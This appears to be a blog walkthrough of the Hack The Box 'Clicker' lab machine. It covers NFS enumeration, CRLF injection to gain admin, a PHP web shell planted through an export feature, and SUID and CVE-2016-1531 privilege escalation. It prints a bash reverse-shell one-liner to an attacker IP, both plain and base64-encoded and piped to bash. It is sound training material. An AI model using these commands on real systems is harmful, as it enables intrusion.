Post

HTB Clicker: Walkthrough

Posted Updated
Preview Image
By partyh4t
6 min read
HTB Clicker: Walkthrough

image

We begin with an open NFS mount that contains a webservers source code backup. Through analysing it, we can find a CRLF Injection vulnerability, mallowing us to gain access to an admin.php endpoint. We can then leverage that endpoint to perform an SQL injection attack, gaining RCE on the host. The Privilege escalation involves exploiting a vulnerable binary to read a users SSH key. This finally ends with us abusing sudo privileges on a script alongside CVE-2016-1531 to gain root access.

0) Machine Overview

  1. Scans
  2. NFS Enumeration
  3. Web Enumeration
  4. Privilege Escalation
  5. Privilege Escalation 2

1) Scans

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_  256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.52 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34963/udp   mountd
|   100005  1,2,3      36427/udp6  mountd
|   100005  1,2,3      43273/tcp   mountd
|   100005  1,2,3      59335/tcp6  mountd
|   100021  1,3,4      34348/udp6  nlockmgr
|   100021  1,3,4      35611/tcp   nlockmgr
|   100021  1,3,4      39272/udp   nlockmgr
|_  100021  1,3,4      44029/tcp6  nlockmgr
2049/tcp  open  nfs      3-4 (RPC #100003)
35611/tcp open  nlockmgr 1-4 (RPC #100021)
38251/tcp open  status   1 (RPC #100024)
43273/tcp open  mountd   1-3 (RPC #100005)
57085/tcp open  mountd   1-3 (RPC #100005)
59583/tcp open  mountd   1-3 (RPC #100005)

2) NFS Enumeration

Let’s first check out this NFS mount:

image

Lets try mounting it:

image

image

We’ll just copy that file and put it into another directory, that isn’t where the mount is located, and then unzip it. We should find what seems to be the web applications source code:

image

3) Web Enumeration

Lets analyze these files and see what interesting information we can find.

Firstly, I notice there are multiple parameters that are given to the user on creation:

image

I first tried a sort of mass-assignment and tried giving the role to myself on creation, but that didn’t work.

However, some parameters are passed in the URL when saving the game at /save_game.php:

image

So I thought, what if we try passing the role parameter in there as well, and setting it to Admin? Well reviewing the source code, that isn’t possible:

image

But this got me thinking of ways to bypass this security check.

  • I tried URL Encoding the word role, but it caught it.
  • I tried using unicode characters, different languages, but none of it worked.

Eventually, I came across a method called CRLF Injection

What this is basically going to allow us to do is, since I’m assuming its checking for the role keyword in the URL parameter, we can inject the characters CRLFCRLF, making sure they are URL-encoded, and then specify our role parameter. And what that will do is basically fool the web-application into thinking that the body of the HTTP request begins right after the CRLF characters.

image

image

Now if we log out and log back in, we should be able to access /admin.php. The reason we need to re-log is because if we look back at the source code, it checks our SESSION id to then decide if we’re authorized to access it or not.

image

Now all we have access to is an Export function or mechanism. One thing I noticed while looking through the source code was that, of all the functions within the source code, they all used prepared statements… Except one:

image

And that variable in this case, seems to be $threshold.

image

And if we go to export these top players, and intercept the request:

image

And then inject some SQL into it…. It doesn’t work :(

I tried for quite a while with different payloads, but I just couldn’t get it to work. So I moved on from trying to perform SQLi.

I did however try messing with the extension. Now normally, it only allowed for either .txt, .pdf, .html. But if we manually change it ourselves through burp, we can specify php, and it would work.

Combine that with the fact that the SQL query is retrieving nickname, we can try injecting some of our own PHP code using save_game.php into the nickname parameter, and then hopefully, we’ll be able to get a web shell.

Had to make a new user as the settings reset. image

image

image

image

Lets get a full shell now.

1
2
3
4
5
6

First i base64 encoded:
/bin/bash -i >& /dev/tcp/10.10.14.14/5555 0>&1

and then i use that as the payload with echo, then base64 decode it, and then execute bash.

echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0LzU1NTUgMD4mMQo=%20|%20base64%20-d%20|%20bash

image

4) Privilege Escalation

First lets check out that db since we have credentials for it from our source-code.

image

image

Tried cracking a few of these see to if there’s anything worth-while. Couldn’t crack any.

If we check for SUIDs:

image

An interesting file in /opt/manage shows up.

image

Lets take the executable offline and try reversing it to see how it functions.

image

So it seems that it has its base 4 cases, but then if the case falls outside of any of those 4, it defaults to the default case shown at the bottom. We cant know for sure what the command is doing with what we know, but we can assume that its going to read out a file since one of the else functions in the code shows:

image

Lets try having it read some files.

image

Have it read jack’s id_rsa:

image

Before we try SSHing in, we’ll need to fix the format of the key by adding a few - at the start and end of the id_rsa, since as u can see, the format is a little messed up as is:

image

image

I had to add 2 - to the start and end for it to work.

Now we can finally SSH in:

image

5) Privilege Escalation 2

Lets run a quick sudo -l:

image

Checking out the file:

image

I originally had tried a method where I made my own set binary, set it as an alias and within my PATH, hoping that it would execute before the script sets my PATH manually, but that didn’t work.

With some further enumeration (mainly wondering why that SETENV privilege was given to us) and some help, the vulnerability lies in that xml_pp is a perl script that’s vulnerable to CVE-2016-1531

To exploit it, we set 2 variables, one setting /bin/bash as a SUID, as we execute the file:

image

image

Pwned.

HTB
HTB SQL Injection CRLF Injection Bin Exploitation CVE
This post is licensed under CC BY 4.0 by the author.